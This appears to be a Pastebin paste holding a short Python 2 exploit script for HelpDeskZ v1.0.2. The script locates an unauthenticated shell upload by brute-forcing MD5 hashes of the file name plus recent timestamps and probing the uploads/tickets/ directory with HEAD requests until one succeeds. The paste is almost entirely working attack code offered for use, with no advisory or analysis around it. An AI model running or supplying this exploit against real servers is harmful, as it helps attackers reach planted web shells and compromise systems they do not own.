Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import hashlib
- import time
- import sys
- import requests
- print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
- if len(sys.argv) < 4:
- print "Usage: {} [baseUrl] [nameOfUploadedFile] [fileExtension]".format(sys.argv[0])
- sys.exit(1)
- helpdeskzBaseUrl = sys.argv[1]
- upload_url = helpdeskzBaseUrl + "uploads/tickets/"
- fileName = sys.argv[2]
- fileExt = sys.argv[3]
- currentTime = int(time.time())
- for x in range(0, 900):
- plaintext = fileName + str(currentTime - x)
- md5hash = hashlib.md5(plaintext).hexdigest()
- url = upload_url+md5hash+fileExt
- response = requests.head(url)
- if response.status_code == 200:
- print "found!"
- print url
- sys.exit(0)
- print "Sorry, I did not find anything"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement